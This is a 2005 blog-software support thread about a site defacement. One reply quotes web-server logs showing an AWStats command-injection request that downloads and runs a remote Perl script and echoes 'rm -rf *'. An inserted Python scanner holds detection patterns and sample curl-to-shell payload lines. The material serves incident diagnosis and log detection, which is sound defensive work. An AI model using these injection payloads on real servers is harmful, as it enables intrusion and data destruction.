XTech Inc
Posted: Tue Jul 05, 2005 5:54 am
by davecjr
I guess I've been owned! My website was doing fine and I got home tonight to find it only now says:
XTech Inc
And I guess I'm not the only one. Anybody else have the same problem and know what to do about it before I spend too much time trying to figure it out? My domain name is
www.thecockrells.com.
Posted: Tue Jul 05, 2005 6:11 am
by davecjr
Well it seems replacing the index.php got my site back up and running but I hope that's all it messed up. Anybody else have this problem? Anybody know why or how this could have happened? I did a search for XTech Inc and found that they have defaced a bunch of websites recently. I was running a nightly snapshot dated 20050613 if that helps anyone.
Posted: Tue Jul 05, 2005 8:46 am
by winkiller
If you blame serendipity it may be because of you not upgrading to 0.8.2/latest svn snapshot after the XMLRPC issues were fixed.
Posted: Tue Jul 05, 2005 2:58 pm
by davecjr
I really wasn't trying to complain or blame anyone. I knew about the update and can't remember if I did it but will do a little more reading! I just wanted to let the right folks know just in case there were more to it.
Posted: Tue Jul 05, 2005 5:22 pm
by winkiller
As of now there doesn't seem to be more to it.

Sad to hear they hit you.
Perhaps you should change your passwords on that webhost for security reasons unless you know that absolutely nothing could have happened.
Posted: Tue Jul 05, 2005 5:53 pm
by davecjr
I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
thx in advance...
Posted: Tue Jul 05, 2005 6:43 pm
by kidgoo
davecjr wrote: I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
thx in advance...
Hi,
Version 0.9 isn't to beta yet...it's currently at alpha-3. That said, it's what I use as my main blog, so it's pretty stable.
Snapshots for developmental versions are usually at
http://s9y.org/12.html, but I assume because of the hardware problems with the server, the snapshots aren't working right.
You can grab the sources from SVN if you really want, but I'd just recommend upgrading to 0.8.2 from the tarball on the s9y downloads page...
This is just my being curious, but have you checked your webserver logs to see how it was compromised? The easiest way, if you have apache, is to grep -R 'wget' /var/log/apache*, as most of the script kiddies try to use wget...
Posted: Tue Jul 05, 2005 8:09 pm
by davecjr
I may not have mentioned it but I am on 9 alpha 3 and I was using the snapshot dated 0613 but didn't know where I could download the entire zip since they weren't listed on
http://s9y.org/12.html anymore.
I did look through the logs but I don't guess I know what I'm looking for.

Posted: Tue Jul 05, 2005 9:37 pm
by kidgoo
Sorry...missed that you were running a snapshot...
You could use SVN to directly download s9y from berlios. Look at
http://developer.berlios.de/svn/?group_id=2573 for information.
About the logs, what you're looking for is anything that's "funny." Something that is very, very funny is that there are wget commands in an apache error or access log. A server I admin was recently hacked because a user installed an old, insecure version of a stats program. This is what the hacking attempt looked like in my logs:
access.log:
66.159.247.81 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1" 400 373 "-" "-"
error.log:
[Mon Jun 27 18:57:00 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 19:01:57 2005] [error] mod_gzip: TRANSMIT_ERROR:0
--19:59:40-- http://lamer.biz/sesssiune
=> `sesssiune'
Resolving lamer.biz... 82.165.128.204
Connecting to lamer.biz[82.165.128.204]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,811 [text/plain]
0K .......... .......... 100% 293.60 KB/s
19:59:40 (293.60 KB/s) - `sesssiune' saved [20811/20811]
sh: line 1: /awstats.main.conf: No such file or directory
[Mon Jun 27 19:59:44 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesssiune;perl%20sesssiune;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 20:04:41 2005] [error] mod_gzip: TRANSMIT_ERROR:0
This is all very funny for apache to be doing...
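The grep-for-wget advice above works, but the excerpt also shows two other tells worth automating: the request line carries shell metacharacters (`|`, `;`) and download tools in its query string, and because the injected payload contains spaces, Apache logged it with a 400 and the "erroneous characters after protocol string" error. The following scanner is an added example written for this page, not code from kidgoo or from the Serendipity project; it parses combined-format access-log lines, percent-decodes the query string (including double encoding), and reports which indicators fired. The sample log lines are constructed to mirror the excerpt's shape and use RFC 5737 addresses and a `.invalid` host rather than real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the log excerpt quoted in the thread.
# Addresses are RFC 5737 documentation ranges and the host is a .invalid
# placeholder; none of these are real indicators.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20dropper.invalid/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1" 400 373 "-" "-"
203.0.113.9 - - [27/Jun/2005:18:58:12 -0400] "GET /blog/index.php?/archives/12-hello.html HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Jun/2005:18:59:01 -0400] "POST /blog/serendipity_xmlrpc.php HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [27/Jun/2005:19:59:44 -0400] "GET /cgi-bin/stats.pl?dir=%7Ccurl%20-s%20dropper.invalid%2Fx%7Csh%7C HTTP/1.1" 500 0 "-" "-"
"""

# Combined-log prefix. The request string is matched lazily up to the closing
# quote that precedes the 3-digit status, so a request line containing spaces
# (as injected shell commands often do) still parses instead of being dropped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*?)" (?P<status>\d{3}) (?P<size>\S+)'
)

# (compiled regex, reason) pairs applied to the percent-decoded query string
# only, so ordinary path segments cannot trigger them.
MARKERS = [
    (re.compile(r'[|;`]'), "shell metacharacter in query"),
    (re.compile(r'\b(?:wget|curl|fetch|lynx)\b'), "download tool in query"),
    (re.compile(r'\bcd\s+/tmp\b'), "cd into /tmp"),
    (re.compile(r'\b(?:perl|sh|bash|python)\s+\S+'), "interpreter invocation"),
    (re.compile(r'\brm\s+-rf\b'), "destructive rm"),
]


def decode_target(target: str) -> str:
    """Percent-decode repeatedly (at most 3 rounds) so a double-encoded
    payload such as %257C -> %7C -> | is inspected in the clear."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def parse_line(line: str):
    """Split one combined-log line into fields; returns None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tokens = m.group("request").split(" ")
    # A well-formed request line is exactly METHOD SP TARGET SP PROTOCOL.
    well_formed = len(tokens) == 3 and tokens[-1].startswith("HTTP/")
    if well_formed:
        target = tokens[1]
    else:
        # Rejoin everything between the method and the protocol token so the
        # whole injected payload is decoded and inspected as one string.
        body = tokens[1:-1] if tokens[-1].startswith("HTTP/") else tokens[1:]
        target = " ".join(body)
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": tokens[0],
        "target": target,
        "status": int(m.group("status")),
        "well_formed": well_formed,
    }


def find_markers(decoded_target: str):
    """Return the reasons whose pattern matches the query part of the target."""
    query = decoded_target.partition("?")[2]
    return [reason for rx, reason in MARKERS if rx.search(query)]


def scan_access_log(text: str):
    """Return one hit per suspicious request: parsed fields, decoded target, reasons."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = decode_target(rec["target"])
        reasons = find_markers(decoded)
        if not rec["well_formed"]:
            # Whitespace inside the request line is what produced the 400 and the
            # "erroneous characters after protocol string" error in the thread.
            reasons.append("malformed request line")
        if reasons:
            hits.append({**rec, "decoded": decoded, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["status"]} {h["decoded"]}')
        for r in h["reasons"]:
            print("   -", r)
```

Run it against a real file with `scan_access_log(open("/var/log/apache2/access.log").read())`; the malformed-request-line check is the useful addition over a plain `grep wget`, because a payload that fetches with something other than wget still breaks the request line the same way.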
Posted: Wed Jul 06, 2005 6:01 pm
by davecjr
I didn't notice anything that I thought was too funny but will dig more. I had something else happen today that I hope isn't related but I haven't done anything else but post an article since I fixed the XTech problem.
Could this be related to permalink problems? I added the permalink plugin a while ago but never really used it. I added an article to my blog this morning and now all my links to articles just point to:
http://www.thecockrells.com/blog/permalink/UNKNOWN.html
If it isn't possible for something like this to be related to the xml-rpc issue, any ideas?!
Again thanks in advance...
Posted: Wed Jul 06, 2005 6:25 pm
by kidgoo
That is plugin related. It looks like you've installed the custom permalink plugin, but haven't been changing the default. If you haven't used it, I'd just remove the custom permalink plugin...
Posted: Wed Jul 06, 2005 6:35 pm
by garvinhicking
Indeed, it slipped my mind when having patched the plugin to adjust the right permalink to use if a permalink is non-unique.
Will change this this weekend
Regards,
Garvin
Posted: Wed Jul 06, 2005 7:45 pm
by davecjr
I thought it had to be installed for some other plugins like the contact form but outside of that, I haven't used it but had considered using it. I just wonder why it started acting funny today. Like I said, I've had it installed for a little while now and never changed anything associated with it and this just started acting like this today.
I'll just uninstall anyway. Earlier I asked about a place to download a snapshot as a single download like you once could. I appreciate someone pointing me to the Berlios site but I had already looked there and couldn't find a way to download the entire package instead of single files. Am I missing something or is that just not available anymore?
Thanks
Posted: Thu Jul 07, 2005 4:50 pm
by garvinhicking
The snapshots are currently not available, that is right. They will be put online again once our server is running at full speed again.
Regards,
Garvin